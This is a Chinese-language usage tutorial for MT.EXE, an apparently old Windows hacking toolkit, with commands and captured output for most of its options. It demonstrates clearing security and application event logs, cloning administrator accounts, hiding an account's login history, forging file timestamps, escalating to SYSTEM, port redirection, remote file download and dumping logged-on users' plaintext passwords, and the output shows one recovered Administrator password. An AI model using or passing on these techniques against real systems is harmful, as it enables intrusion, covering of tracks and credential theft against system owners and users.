MT.EXE 中文使用教程

    Usage: mt.exe <Opintion>
    Opintion :
     -filter          ---Change TCP/IP filter to on/off status.
     -addport         ---Add ports to the filter' allowed portlist.
     -setport         ---Set ports as the filter' allowed portlist.
     -nicinfo         ---List TCP/IP interface info.
     -pslist          ---List active processes.
     -pskill          ---Kill a specified process.
     -dlllist         ---List dlls of a specified process.
     -sysinfo         ---List system info.
     -shutdown         ---Shutdown system.
     -reboot          ---Reboot system.
     -poweroff         ---Turn off power.
     -logoff          ---Logoff current user's session.
     -chkts          ---Check Terminal Service info.
     -setupts         ---Install Terminal Service.
     -remts          ---Remove Terminal Service.
     -chgtsp          ---Reset Terminal Service port.
     -clog           ---Clean system log.
     -enumsrv         ---List all services.
     -querysrv         ---List detail info of a specified service.
     -instsrv         ---Install a service.
     -cfgsrv          ---Changes the configuration of a service.
     -remsrv          ---Remove a specified service.
     -startsrv         ---Start a specified service.
     -stopsrv         ---Stop a specified service.
     -netget          ---Download from http/ftp.
     -redirect         ---Port redirect.
     -chkuser         ---List all account、sid and anti clone.
     -clone          ---Clone from admin to dest.
     -never          ---Set account looks like never logged on.
     -killuser         ---Del account. Even "guest" account.
     -su            ---Run process as Local_System privilege.
     -findpass         ---Show all logged on user's pass.
     -netstat         ---List TCP connections.
     -killtcp         ---Kill TCP connection.
     -psport          ---Map ports to processes.
     -touch          ---Set the file times for a specified file.
     -secdel          ---Secure delete files and directory or zap free
     -regshell         ---Enter a console registry editor.
     -chkdll          ---Detect gina dll backdoor.
    一,MT.EXE –filter
    MT -filter <ON&line;OFF>  ----Enabld&line;Disable TCP/IP Filter.
    D:\>MT -FILTER on
    Enable TCP/IP Filter successful!
    D:\>MT -FILTER off
    Disable TCP/IP Filter successful!
    二, D:\>mt -addport
    mt -addport <TCP&line;UDP> NIC PortList  ----Add ports to the allowed portlist.
                       Use "-nicinfo" get Nic number first.
    五, -pslist          ---List active processes.
    D:\>mt -pslist
    PID   Path
    0    [Idle Process]
    4    l[System]
    464   \SystemRoot\System32\smss.exe
    524   \??\C:\WINDOWS\system32\csrss.exe
    548   \??\C:\WINDOWS\system32\winlogon.exe
    592   C:\WINDOWS\system32\services.exe
    604   C:\WINDOWS\system32\lsass.exe
    780   C:\WINDOWS\system32\svchost.exe
    844   C:\WINDOWS\System32\svchost.exe
    876   C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe
    932   C:\WINDOWS\System32\svchost.exe
    960   C:\WINDOWS\System32\svchost.exe
    1128  C:\WINDOWS\System32\alg.exe
    1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    1188  D:\mysql\bin\mysqld-nt.exe
    1280  C:\WINDOWS\System32\nvsvc32.exe
    1728  C:\WINDOWS\Explorer.EXE
    212   C:\WINDOWS\System32\ctfmon.exe
    504   D:\Program Files\Microsoft Office\Office10\WINWORD.EXE
    924   D:\Program Files\MYIE2\myie.exe
    1348  C:\WINDOWS\System32\dllhost.exe
    1516  C:\WINDOWS\System32\dllhost.exe
    1856  C:\WINDOWS\System32\msdtc.exe
    1356  C:\WINDOWS\System32\cmd.exe
    1004  C:\WINDOWS\System32\conime.exe
    1748  D:\Program Files\HyperSnap-DX 5\HprSnap5.exe
    1272  D:\MT.exe
    PsList v1.12 - Process Information Lister
    Copyright (C) 1999-2000 Mark Russinovich
    Systems Internals -
    Process information for LIN:
    Name     Pid Pri Thd Hnd  Mem   User Time  Kernel Time  Elapsed Time
    Idle      0  0  1  0   20  0:00:00.000  0:40:22.453  0:00:00.000
    System     4  8 56 258   40  0:00:00.000  0:00:06.098  0:00:00.000
    smss     464 11  3  21   44  0:00:00.010  0:00:00.100  0:43:10.565
    csrss    524 13 11 416  3892  0:00:02.042  0:00:14.240  0:43:06.449
    winlogon   548 13 19 443  1044  0:00:01.171  0:00:01.882  0:43:04.185
    services   592  9 21 307  940  0:00:00.721  0:00:01.662  0:43:01.582
    lsass    604  9 19 304  1132  0:00:00.540  0:00:00.690  0:43:01.532
    svchost   780  8  8 255  824  0:00:00.200  0:00:00.160  0:42:58.687
    svchost   844  8 55 1214  5740  0:00:02.393  0:00:01.932  0:42:58.457
    StyleXPSer  876  8  2  38  416  0:00:00.110  0:00:00.070  0:42:58.357
    svchost   932  8  5  46  396  0:00:00.020  0:00:00.040  0:42:56.705
    svchost   960  8  7  90  204  0:00:00.060  0:00:00.040  0:42:56.244
    alg     1128  8  5 116  220  0:00:00.020  0:00:00.060  0:42:49.144
    inetinfo  1160  8 17 281  864  0:00:00.210  0:00:00.330  0:42:49.054
    mysqld-nt  1188  8  6  81   76  0:00:00.010  0:00:00.050  0:42:47.602
    nvsvc32   1280  8  3  74   92  0:00:00.090  0:00:00.160  0:42:45.378
    Explorer  1728  8 20 583 19548  0:00:11.436  0:00:27.519  0:42:37.607
    ctfmon    212  8  1 109  1596  0:00:00.340  0:00:01.031  0:42:26.982
    WINWORD   504  8  5 394 43428  0:01:04.072  0:00:25.757  0:41:26.194
    myie     924  8  9 312  3116  0:00:09.623  0:00:07.460  0:35:36.582
    dllhost   1348  8 23 240  1540  0:00:01.982  0:00:00.460  0:35:24.414
    dllhost   1516  8 15 200  784  0:00:00.190  0:00:00.230  0:35:22.912
    msdtc    1856  8 18 149  372  0:00:00.080  0:00:00.090  0:35:18.896
    cmd     1356  8  1  21  592  0:00:00.080  0:00:00.100  0:32:44.414
    conime   1004  8  1  25  664  0:00:00.050  0:00:00.030  0:32:42.652
    HprSnap5  1748  8  6 168  1648  0:00:01.932  0:00:03.414  0:18:38.798
    cmd     1548  8  1  20  1392  0:00:00.020  0:00:00.010  0:00:28.020
    pslist   1716  8  2  82  1672  0:00:00.030  0:00:00.050  0:00:00.400
    Process      PID User
    Idle       0
    System      4
    smss.exe     464 NT AUTHORITY\SYS
    csrss.exe     524 NT AUTHORITY\SYS
    winlogon.exe   548 NT AUTHORITY\SYS
    services.exe   592 NT AUTHORITY\SYS
    lsass.exe     604 NT AUTHORITY\SYS
    svchost.exe    780 NT AUTHORITY\SYS
    svchost.exe    844 NT AUTHORITY\SYS
    StyleXPService.exe 876 NT AUTHORITY\SY
    svchost.exe    932
    svchost.exe    960
    alg.exe      1128
    inetinfo.exe   1160 NT AUTHORITY\SYS
    mysqld-nt.exe   1188 NT AUTHORITY\SYS
    nvsvc32.exe    1280 NT AUTHORITY\SYS
    Explorer.EXE   1728 LIN\lin
    ctfmon.exe    212 LIN\lin
    WINWORD.EXE    504 LIN\lin
    MyIE.exe     924 LIN\lin
    dllhost.exe    1348
    dllhost.exe    1516 NT AUTHORITY\SYS
    msdtc.exe     1856
    cmd.exe      1356 LIN\lin
    conime.exe    1004 LIN\lin
    HprSnap5.exe   1748 LIN\lin
    cmd.exe      1548 LIN\lin
    pulist.exe    1788 LIN\lin
    从上面的情况可以知道,输入MT还没有PSLIST功能的强大,能够列出Name,Pid,Pri,Thd Hnd,Mem,User Time,Kernel Time,Elapsed Time,但是较于PULIST,已经是很好的了,能够列出进程名和运行路径,已经能够满足我们平时的使用了.
    六, D:\>mt -pskill
    mt -pskill <PID&line;ProcessName>
    同样也是PSTOOLS的工具之一了,我们使用MyIE.exe这个软件作为测试,看看他们能不能杀死这个进程,首先是使用MT,通过上面的MT –PSLIST,我们知道MyIE.exe的PID值是924,于是输入:
    D:\>mt -pskill 924
    Kill process sccuessful!
    D:\hack>pskill 220
    PsKill v1.03 - local and remote process killer
    Copyright (C) 2000 Mark Russinovich
    Process 220 killed.
    我们发现MT一个比较弱的功能的就是没有和PSKILL一样支持网络功能,在PSKILL中可以通过pskill [\\RemoteComputer [-u Username]] <process Id or name>
      -u  Specifies optional user name for login to
       remote computer.
    七, D:\>mt -dlllist
    mt -dlllist <PID&line;ProcessName>
    列出进程中相关的DLL文件,于这个相关功能的软件我没有找到,不过我们使用Windows优化大师,我们先来测试一下,这次我们选中的进程是StyleXPService.exe.还是使用MT –pslist得到其PID值876,输入:
    D:\>mt -dlllist 876
    C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe
    八, mt –sysinfo
    列出系统信息,还是使用Windows优化大师与之作比较,发现几乎没有任何的失误,可见准确性特别强的,由于页面的关系,数据不再展示. 这个功能和程序sysinfo.exe是一样的.
    九,  -shutdown         ---Shutdown system.
    -reboot          ---Reboot system.
    -poweroff         ---Turn off power.
    -logoff          ---Logoff current user's session.
    十,  -chkts          ---Check Terminal Service info.
     -setupts         ---Install Terminal Service.
     -remts          ---Remove Terminal Service.
     -chgtsp          ---Reset Terminal Service port.
    十一,  -clog           ---Clean system log.
    D:\>mt -clog
    mt -clog <app&line;sec&line;sys&line;all>   ---Clean Application&line;Security&line;System&line;All logs.
    从上面的可以看出,我们可以清除 “应用程序” “安全性” “系统”3个日志,我随便选择一个,用MT删除 “应用程序”日志,输入:
    D:\>mt -clog app
    Clean EventLog : Application successful!
    十二,  -enumsrv         ---List all services.
    D:\>mt -enumsrv
    mt -enumsrv <SRV&line;DRV>     ----List all Win32&line;Driver Service
    D:\>mt -enumsrv srv
    Num  ServiceName       DisplayName
    0  Alerter         Alerter
    1  ALG           Application Layer Gateway Service
    2  AppMgmt         Application Management
    3  aspnet_state      ASP.NET State Service
    4  AudioSrv        Windows Audio
    D:\>mt -enumsrv drv
    Num  ServiceName       DisplayName
    0  Abiosdsk        Abiosdsk
    1  abp480n5        abp480n5
    2  ACPI          Microsoft ACPI Driver
    3  ACPIEC         ACPIEC
    4  adpu160m        adpu160m
    5  aec           Microsoft Kernel Acoustic Echo Canceller
    6  AFD           AFD 网络支持环境
    7  Aha154x         Aha154x
    8  aic78u2         aic78u2
    十三,  D:\>mt -querysrv
    mt -querysrv <ServiceName>   ----Show detial info of a specifies service.
    D:\>mt -querysrv Alerter
    ServiceName:  Alerter
    Status:    Stopped
    ServiceType:  Win32 Share Service
    Start type:  Demand Start
    LogonID:    NT AUTHORITY\LocalService
    FilePath :   C:\WINDOWS\System32\svchost.exe -k LocalService
    DisplayName:  Alerter
    Dependency:  LanmanWorkstation
    Description:  通知所选用户和计算机有关系统管理级警报。如果服务停止,使用管理警
    报的程序将不会受到它们。如果此服务被禁用,任何直接依赖它的服务都将不能启动。Start type:  Demand Start
    LogonID:    NT AUTHORITY\LocalService
    FilePath :   C:\WINDOWS\System32\alg.exe
    DisplayName:  Application Layer Gateway Service
    Description:  为 Internet 连接共享和 Internet 连接防火墙提供第三方协议插件的支
    十四,  -instsrv         ---Install a service.
     -cfgsrv          ---Changes the configuration of a service.
     -remsrv          ---Remove a specified service.
     -startsrv         ---Start a specified service.
     -stopsrv         ---Stop a specified service.
    十五, D:\>mt -netget
     mt -netget <url> <filename to saved>    ---Download from http/ftp.
    D:\>mt -netget f:\server.exe
    Download File from to f:\server.exe.
    Download completed   272992 bytes ......
    Downloaded  266.6KB  at 266 dot 6KB/S in 0sec.
    File <f:\server.exe> TotalByte : 266 KB.
    十六, D:\>mt -redirect
    mt -redirect <TargetIP> <TargetPort> <ListenPort>  ----TCP port redirector.
    D:\>mt -redirect 80 81
    ------Waiting Connection-----
    D:\>mt -redirect 80 81
    ------Waiting Connection-----
    Accept client==>
    connect to 80 success!
    Thread 1988 recv 2 bytes.
    Thread 1988 send 2 bytes.
    Thread 1988 recv 2 bytes.
    Thread 1988 send 2 bytes.
    Thread 316 recv 224 bytes.
    Thread 316 send 224 bytes.
    HTTP/1.1 400 Bad Request
    Server: Microsoft-IIS/5.1
    Date: Wed, 19 May 2004 13:28:53 GMT
    Content-Type: text/html
    Content-Length: 87
    <html><head><title>Error</title></head><body>The parameter is incorrect. </body>
    17, D:\>mt -clone
    mt -clone <SourUser> <DestUser>
    D:\hack>mt -clone lin yun
    Fail to Open SAM Key, 操作成功完成。
    D:\>mt -clone lin yun
    Fail to Open SAM Key, 操作成功完成。
    18, D:\>mt -never
     -never          ---Set account looks like never logged on.
    D:\>mt -never 316
    Require System Privilege.提示没有权限,于是
    D:\>mt -su
    Microsoft Windows XP [版本 5.1.2600]
    (C) 版权所有 1985-2001 Microsoft Corp.
    D:\>mt -never 316
    Fail to Set F Value.
    D:\>net user 316
    用户名         316
    全名          316
    国家(地区)代码     000 (系统默认值)
    帐户启用        Yes
    帐户到期        从不
    上次设置密码      2004/5/19 下午 08:22
    密码到期        从不
    密码可更改       2004/5/19 下午 08:22
    需要密码        Yes
    用户可以更改密码    Yes
    允许的工作站      All
    上次登录        从不
    可允许的登录小时数   All
    本地组成员       *Users
    全局组成员       *None
    可以看出来已经修改成功了,虽然显示的是Fail to Set F Value.,但还是成功了.这个功能和never.exe是一样的,只是将特定的的帐户上回登陆时间改为帐户从来没有登陆上过系统.
    成功条件:你要有local system权限
    18,  -killuser         ---Del account. Even "guest" account.
    删除用户,输入D:\>mt -killuser ziqi
    Kill User: ziqi Success!
    D:\>net user
    \\LIN 的用户帐户
    316           Administrator      ASPNET
    Guest          HelpAssistant      IUSR_IMAGE
    IWAM_IMAGE        lin           SUPPORT_388945a0
    但是如果我们以下面这种方式登陆,也就是先运行MT –su得到系统最高权限,在这个CMD下,我们就可以删除账号了,同时也可以删除GUEST用户,虽然我还没有激活这个账号,不知道是什么原因,因为我本身登陆的就已经是administrator组了.删除GUEST的过程:
    D:\>mt -killuser guest
    Kill User: guest Success!
    D:\>net user
    \\ 的用户帐户
    316           Administrator      ASPNET
    HelpAssistant      IUSR_IMAGE        IWAM_IMAGE
    lin           SUPPORT_388945a0     yun
    19,  -su            ---Run process as Local_System privilege.
    以系统特权运行进程,在管理员登陆的情况下输入MT –su,马上弹出另外一CMD窗口,在这个窗口中,可以做任何我们想做的事情,这个也是系统的最高权限了.
    20 -regshell         ---Enter a console registry editor.
    D:\>mt -regshell
    <SubKey>   HARDWARE
    <SubKey>   SAM
    <SubKey>   SECURITY
    <SubKey>   SOFTWARE
    <SubKey>   SYSTEM
                 Total: 5 SubKey, 0 Value.
    21, -netstat         ---List TCP connections.
    D:\>mt -netstat
    Num LocalIP      Port  RemoteIP     PORT  Status
    11    80    1050  Established
    Active Connections
    Proto Local Address     Foreign Address    State
    22, D:\>mt -killtcp
    mt -killtcp <ConnectionNum>  ----Kill a specifies TCP connection.
    D:\>mt -killtcp 11
    Waiting connection to be close now.
    D:\>mt -netstat
    Num LocalIP      Port  RemoteIP     PORT  Status
    23,  -chkdll          ---Detect gina dll backdoor.
    D:\>mt -chkdll
    GinaDll not found.
    Winlogon Notification Package Dll:
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon
    Please make sure if they were backdoors.
    D:\>mt -chkdll
    GinaDll exist:
     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDll
    24,  -psport          ---Map ports to processes.
    D:\>mt -psport
    Proto  Listen        PID   Path
    TCP      1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    TCP      780   C:\WINDOWS\system32\svchost.exe
    TCP      1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    TCP     1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    TCP     4    [System]
    TCP     960   C:\WINDOWS\System32\svchost.exe
    TCP     1252  C:\WINDOWS\System32\msdtc.exe
    TCP     1176  D:\mysql\bin\mysqld-nt.exe
    TCP    1120  C:\WINDOWS\System32\alg.exe
    TCP    844   C:\WINDOWS\System32\svchost.exe
    TCP    844   C:\WINDOWS\System32\svchost.exe
    TCP    4    [System]
    TCP   4    [System]
    UDP      1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    UDP     780   C:\WINDOWS\system32\svchost.exe
    UDP    1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    UDP    1160  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    UDP    4    [System]
    UDP    960   C:\WINDOWS\System32\svchost.exe
    E:\HACK>fport /ap
    FPort v2.0 - TCP/IP Process to Port Mapper
    Copyright 2000 by Foundstone, Inc.
    Pid  Process      Port Proto Path
    1120         -> 3001 TCP
    960         -> 3025 TCP
    1252         -> 3027 TCP
    4   System     -> 1026 TCP
    4   System     -> 139  TCP
    4   System     -> 3011 TCP
    1160 inetinfo    -> 1025 TCP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    1160 inetinfo    -> 443  TCP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    1160 inetinfo    -> 80  TCP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    844  svchost    -> 3002 TCP  C:\WINDOWS\System32\svchost.exe
    844  svchost    -> 3003 TCP  C:\WINDOWS\System32\svchost.exe
    780  svchost    -> 135  TCP  C:\WINDOWS\system32\svchost.exe
    1176 mysqld-nt   -> 3306 TCP  D:\mysql\bin\mysqld-nt.exe
    960         -> 138  UDP
    4   System     -> 137  UDP
    1160 inetinfo    -> 3020 UDP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    1160 inetinfo    -> 3026 UDP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    1160 inetinfo    -> 500  UDP  C:\WINDOWS\System32\inetsrv\inetinfo.exe
    780  svchost    -> 3456 UDP  C:\WINDOWS\system32\svchost.exe
    24,  -touch          ---Set the file times for a specified file.
    D:\>mt -touch mt1.exe
    Set FileTime Successful.
    CreationTime  : 07/10/2002
    LastAccessTime : 19/05/2004
    LastWriteTime : 07/10/2002
    可以知道其创建时间不使2004年5月19日,而是CreationTime  : 07/10/2002,相信这个也就使yy3写这个程序的时间了.与这个相关的软件有偷touch.exe,可以我电脑里面的这个文件已经本病毒破坏了。
    25,  -chkuser         ---List all account、sid and anti clone.
    26,  -findpass         ---Show all logged on user's pass.
    得到所有登陆用户的密码,由于这个命令是For NT/2K only.,所以我在客户机上面测试这个功能,输入,很容易就得到了密码:
    G:\WINNT\system32>mt -findpass
    mt -findpass
    The logon information :
     Domain  : 316-2AS8L1B1FL5
     Username : Administrator
     Password : winyaj